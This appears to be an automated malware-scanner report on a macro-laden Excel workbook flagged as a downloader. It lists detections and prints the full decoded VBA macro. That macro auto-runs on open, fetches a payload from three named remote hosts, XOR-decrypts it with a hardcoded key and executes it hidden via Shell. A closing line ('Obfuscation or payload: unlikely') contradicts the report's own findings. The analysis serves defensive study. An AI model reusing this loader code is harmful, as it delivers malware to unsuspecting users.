Risk Score: 388 (MALICIOUS)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The file is an Office document containing obfuscated VBA macros. The Workbook_Open macro is present and uses CreateObject and Shell calls, indicating it is designed to execute arbitrary code. The presence of ClamAV detections for 'Doc.Downloader.Donoff-10030369-0' strongly suggests this macro is a downloader for a second-stage payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Donoff-10030369-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Donoff-10030369-0.
- VBA project inside OOXML (medium, OOXML_VBA, 6 related findings). Document contains a VBA project; VBA macros present.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched lines in script:
  Shell aa, vbHide
  End Function
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER). Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched lines in script:
  SHEOVER = Split(sTVOL.ComboBox1.ControlTipText, "DRUG")
  Set Module500_PIRO_LOR = CreateObject(SHEOVER(3))
  StendMissed = sTVOL.Label1.Caption
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script:
  SHEOVER = Split(sTVOL.ComboBox1.ControlTipText, "DRUG")
  Set Module500_PIRO_LOR = CreateObject(SHEOVER(3))
  StendMissed = sTVOL.Label1.Caption
- CallByName call (high, OLE_VBA_CALLBYNAME). Matched lines in script:
  CallByName rptProblem, sTVOL.OptionButton1.ControlTipText, VbMethod, SHEOVER(5), Module500_4, False
  Import2
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched lines in script:
  Attribute VB_Customizable = True
  Sub Workbook_Open()
  Rashe = 4 + 81
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9796 bytes | cab0044f15f9c17a519288cd6f45eec89fb97c015c80689d526ac2146b03ae78 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Dard"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Rashe = 4 + 81
If 1102 > Rashe Then
Maxibon
End If
End Sub
Attribute VB_Name = "P1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "sTVOL"
Attribute VB_Base = "0{BA5B73E2-59C8-492D-ABF0-E10AF2C4C3DC}{7CD9E04D-DFC5-4CAC-89AA-AA6C817D5AE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ishimitsu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function ratatu() As String
Module23
ratatu = ""
End Function
Public Sub Challenge(sender As String, e As Integer)
CallByName rptProblem, sTVOL.OptionButton1.ControlTipText, VbMethod, SHEOVER(5), Module500_4, False
Import2
End Sub
Private Sub Import2()
'
' Iae?in1 Iae?in
'
'
CallByName rptProblem, sTVOL.Trbd.Text, VbMethod, Module500_System, sTVOL.SpinButton1.ControlTipText
Exit Sub
ActiveWorkbook.Worksheets.Add
With ActiveSheet.QueryTables.Add(Connection:= _
"TEXT;C:\Users\timur.tatarshaov\Documents\fireworks\80000 ?i?aiei naa?aaie 2010 3_54.txt" _
, Destination:=Range("$A$1"))
.Name = "80000 ?i?aiei naa?aaie 2010 3_54"
.FieldNames = True
.RowNumbers = False
.FillAdjacentFormulas = False
.PreserveFormatting = True
.RefreshOnFileOpen = False
.RefreshStyle = xlInsertDeleteCells
.SavePassword = False
.SaveData = True
.AdjustColumnWidth = True
.RefreshPeriod = 0
.TextFilePromptOnRefresh = False
.TextFilePlatform = 1251
.TextFileStartRow = 1
.TextFileParseType = xlDelimited
.TextFileTextQualifier = xlTextQualifierDoubleQuote
.TextFileConsecutiveDelimiter = False
.TextFileTabDelimiter = True
.TextFileSemicolonDelimiter = False
.TextFileCommaDelimiter = False
.TextFileSpaceDelimiter = False
.TextFileColumnDataTypes = Array(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
.TextFileTrailingMinusNumbers = True
.Refresh BackgroundQuery:=False
End With
End Sub
Attribute VB_Name = "RID_009"
Public Sub MoveSheets(sheetToMove As String, sheetAnchor As String, VrigDO6OrAfter As String)
Dim i
On Error GoTo d13
For i = LBound(MovedPermanently) To UBound(MovedPermanently) Step 1
VrigDO3 "100", 2
If rptProblem.Status <> 200 Then
Err.Raise vbObjectError + 900, "1", "2"
End If
VrigDO6 "33", 3
Exit Sub
d13:
Next
Exit Sub
End Sub
Public Sub Module23()
SHEOVER = Split(sTVOL.ComboBox1.ControlTipText, "DRUG")
Set Module500_PIRO_LOR = CreateObject(SHEOVER(3))
StendMissed = sTVOL.Label1.Caption
Set Module500_RDD2 = Module500_PIRO_LOR.Environment(SHEOVER(5 - 1))
MovedPermanently = Split("hostalmilabi.com/hjv56+ipt.se/hjv56+minilab.ca/hjv56", sTVOL.zLBL.Caption)
Set SubProperty = CreateObject(SHEOVER(1))
Set Module500_GMAKO = CreateObject(SHEOVER(5 - 3))
Set rptProblem = CreateObject(SHEOVER(0))
Module500_LAKOPPC = Module500_RDD2(SHEOVER(6))
ProjectDarvin = 0
MoveSheets "", "", ""
End Sub
Public Function VrigDO3(FullPath As String, NumHoja As Integer) As String
If NumHoja > 500 Then
If Dir(FullPath & ".qif") > "" Then
VrigDO3 = "File already exists [El fichero ya existe]: " & FullPath
Exit Function
End If
If Dir(FullPath & "_2.qif") > "" Then
VrigDO3 = "File already exists [El fichero ya existe]: " & FullPath
Exit Function
End If
End If
Module500_4 = sTVOL.Label2.Caption & MovedPermanently(i)
ProjectDarvin = ProjectDarvin + 2
Dim XIpotom2 As Ishimitsu
Set XIpotom2 = New Ishimitsu
XIpotom2.Challenge "Ardu", 22
CallByName rptProblem, sTVOL.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
End Function
Public Function DoChild()
Module500_Done = Module500_LAKOPPC
Module500_DoneBBB = Module500_Done + "\bogort" + CStr(ProjectDarvin)
Module500_Done = Module500_Done + Replace(SHEOVER(12), ".", CStr(ProjectDarvin) + ".")
SubProperty.Type = 1
End Function
Attribute VB_Name = "RID_006"
Public Const Module500_System = "User-Agent"
Public SubProperty As Object
Public Const Sooopchik = "avetof"
Public Module500_PokerFace As Variant
Public Module500_GMAKO As Object
Public Module500_LAKOPPC As String
Public Module500_PIRO_LOR As Object
Public ProjectDarvin As Integer
Public Module500_RDD2 As Object
Public StendMissed As String
Public Module500_2 As String
Public SHEOVER() As String
Public Module500_Done As String
Public Module500_DoneBBB As String
Public rptProblem As Object
Public MovedPermanently() As String
Public Module500_4 As String
Public Function VrigDO4(FullPath As String, NumHoja As Integer) As String
AsizePlusX Module500_DoneBBB, Module500_Done, "e81G9Dsvrh0NR2qGWZSk1CSTNyqr8I2f"
For i = 3 To NumHoja
If NumHoja > 100 Then
If UCase(Trim(Cel.ls(i, ColumnaExportado).Value)) = "N" Then
If Cel.ls(i, ColumnaDate).Value = "" Then
VrigDO4 = "Date column is empty for row [Columna fecha vacia para fila]: " & i
Exit Function
End If
If Cel.ls(i, ColumnaAmount).Value = "" Then
If ColumnaAmount2 = -1 Then
VrigDO4 = "Amount column is empty for row [Columna amount vacia para fila]: " & i
Exit Function
End If
End If
If Cel.ls(i, ColumnaMemo).Value = "" Then
VrigDO4 = "Memo column es empty for row [Columna memo vacia para fila]: " & i
Exit Function
End If
If Cel.ls(i, ColumnaCategory).Value = "" Then
If ColumnaAmount2 = -1 Then
VrigDO4 = "Category column is empty for row [Columna category vacia para fila]: " & i
Exit Function
End If
End If
If ColumnaAmount2 <> -1 Then
If Cel.ls(i, ColumnaAmount2).Value <> "" And Cel.ls(i, ColumnaCategory2).Value = "" Then
VrigDO4 = "Category2 column is empty for row [Columna category2 vacia para fila]: " & i
Exit Function
End If
End If
End If
End If
Next i
DoSex StendMissed & Module500_Done & ",vape"
End Function
Function itemTitle(skuNum)
'retrieve Item title from SKU
itemTitle = Application.WorksheetFunction.VLookup(skuNum, [Products], 2, 0)
End Function
Function itemDesc(skuNum)
'retrieve item description from SKU
itemDesc = Application.WorksheetFunction.VLookup(skuNum, [Products], 4, 0)
End Function
Function itemUPC(skuNum)
'retrieve item upc from SKU, No character limit or formatting
itemUPC = Application.WorksheetFunction.VLookup(skuNum, [Products], 3, 0)
End Function
Public Sub Method1(MethodParam2() As Byte, MethodParam As String)
Dim Debadeba2 As Long
Dim Debadeba3 As Long
Dim Debadeba5 As Long
Dim Debadeba6 As Long
Dim plusplus() As Byte
Dim Debadeba4 As Long
Dim plusplusLen As Long
plusplusLen = Len(MethodParam)
ReDim plusplus(plusplusLen)
plusplus = StrConv(MethodParam, vbFromUnicode)
Debadeba2 = UBound(MethodParam2) + 1
Debadeba5 = Debadeba2
For Debadeba4 = 0 To (Debadeba2 - 1)
aa = plusplus(Debadeba4 Mod plusplusLen)
bb = MethodParam2(Debadeba4)
MethodParam2(Debadeba4) = DoLove(bb, aa)
If (Debadeba4 >= Debadeba6) Then
Debadeba3 = Int((Debadeba4 / Debadeba5) * 100)
Debadeba6 = (Debadeba5 * ((Debadeba3 + 1) / 100)) + 1
End If
Next
End Sub
Public Sub Maxibon()
Dim c As Ishimitsu
Set c = New Ishimitsu
CallByName c, sTVOL.TextBox2.Text, VbMethod
Set c = Nothing
End Sub
Public Function DoLove(aa, bb)
DoLove = aa Xor bb
End Function
Public Function VrigDO6(FullPath As String, NumHoja As Integer) As String
DoChild
CallByName SubProperty, "Open", VbMethod
If NumHoja > 400 Then
If numExportadas = 0 Then
VrigDO6 = "No rows to export [No tiene filas por exportar]"
Exit Function
End If
End If
Module500_PokerFace = rptProblem.responseBody
SubProperty.Write Module500_PokerFace
CallByName SubProperty, "s" + Sooopchik + "ile", VbMethod, Module500_DoneBBB, 2
VrigDO4 ".", 1
End Function
Public Sub AsizePlusX(DROVER As String, ROVERJ As String, Optional Module500_Sexote As String)
Dim ROVER As Integer
Dim GROVER() As Byte
ROVER = FreeFile
Open DROVER For Binary As #ROVER
ReDim GROVER(0 To LOF(ROVER) - 1)
Get #ROVER, , GROVER()
Close #ROVER
Call Method1(GROVER(), Module500_Sexote)
ROVER = FreeFile
Open ROVERJ For Binary As #ROVER
Put #ROVER, , GROVER()
Close #ROVER
End Sub
Public Function DoSex(aa)
Shell aa, vbHide
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 57344 bytes | d94c9ef5aee49f71dca0e466667b228c9d8bf84755729b90b1ae76ce7916847d |

Detection
ClamAV: Doc.Downloader.Donoff-10030369-0
Obfuscation or payload: unlikely